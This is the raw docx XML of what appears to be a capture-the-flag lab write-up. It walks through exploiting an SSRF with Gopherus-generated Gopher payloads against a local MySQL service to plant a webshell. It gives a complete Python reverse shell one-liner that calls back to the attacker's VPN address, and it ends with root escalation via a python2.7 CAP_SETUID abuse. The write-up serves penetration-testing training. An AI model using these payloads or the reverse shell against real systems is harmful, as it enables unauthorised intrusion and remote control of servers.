          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html</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49">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://infosecwriteups.com/how-gopher-works-in-escalating-ssrfs-ce6e5459b630</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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use a tool for this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">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8aap4nunryht" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gopherus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">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If you know a location vulnerable to SSRF, this tool helps generate Gopher payloads to exploit SSRF and obtain RCE. It can also help you get a reverse shell on the victim server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/tarunkant/Gopherus</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Let’s Go</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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14600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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generating the payload with Gopherus, we need to URL-encode it again because curl will decode it once, which would otherwise break the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">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We can use:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://urlencode.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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49500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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performing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">double URL encode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can send our payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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http://&lt;Site&gt;/check?url=gopher://127.0.0.1:3306/_(Payload-Double-Url-encode)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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06600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="80"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943600" cy="2006600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can access our webshell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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14600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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next step is to obtain a reverse shell, and for that, we will use Python.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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89200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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Online Reverse Shell Generator:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.revshells.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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5562600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="78"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9436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5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60600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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use the mentioned site to generate a Python reverse shell payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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-c 'import socket,subprocess,os;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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s.connect(("&lt;IP-VPN&gt;",443));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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os.dup2(s.fileno(),0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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os.dup2(s.fileno(),1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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os.dup2(s.fileno(),2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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pty; pty.spawn("bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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54200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79"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5943600" cy="1854200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we have a shell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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73300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74"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h3xaioy3s8yh" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PrivEsc:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.p4mrxpeokrrb" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LinPEAS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">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LinPEAS is a script that searches for possible privilege escalation paths on Linux/Unix/MacOS hosts.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId39">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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38400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76"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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.786wtk6hdco0" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">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Capabilities are permissions that divide root privileges into smaller pieces so that a process can have only the specific privileged capabilities it needs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">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We identify that Python has the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP_SETUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> capability.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gtfobins.github.io/gtfobins/python/#capabilities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">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If the binary has the Linux capability </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP_SETUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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escalate privileges using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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python2.7 -c "import os; os.setuid(0); os.system('/bin/bash')"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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using Python to set our UID to 0 (=root), we can read the final flag =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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35200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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5943600" cy="2235200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId43" w:type="default"/>
      <w:headerReference r:id="rId44" w:type="first"/>
      <w:headerReference r:id="rId45" w:type="even"/>
      <w:footerReference r:id="rId46" w:type="default"/>
      <w:footerReference r:id="rId47" w:type="first"/>
      <w:footerReference r:id="rId48"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5">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="17"/>
    <w:bookmarkEnd w:id="17"/>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73" name="image12.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image12.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76">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77">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0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="59" name="image5.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image5.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UHC v 9</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30.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image30.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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/python/#capabilities" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId45"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26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infosecwriteups.com/how-gopher-works-in-escalating-ssrfs-ce6e5459b630" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/tarunkant/Gopheru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urlencode.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/training/training-machines/2"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image" Target="media/image21.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Inje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0.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w5SZkPu6XmoAY+h7Wq6GcvN/9Q==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnBkNzZwbWJkdjJsejIOaC5vZ3c2dWw0dW5nbWQyDmguMnVncnVkdmpxbmQyMg5oLjN3emxyY3hub3dnMTIOaC42ejY4ZjNvcDIzbjQyDmgub3F5NTFxMnJlbXA4Mg5oLjNtMjNvc3A2azFuZDIOaC50ZHN3Y3A5anBvY2IyDmguNGpxNHc0eWY5cDd5Mg5oLjhhYXA0bnVucnlodDIOaC5oM3hhaW95M3M4eWgyDmgucDRtcnhwZW9rcnJiMg5oLjc4Nnd0azZoZGNvMDIOaC4xNzVmNWNzOTR6MG84AHIhMWZLd24zV0NGQzlkZGN0UFprZlhwTjB5TXpES3F2Qn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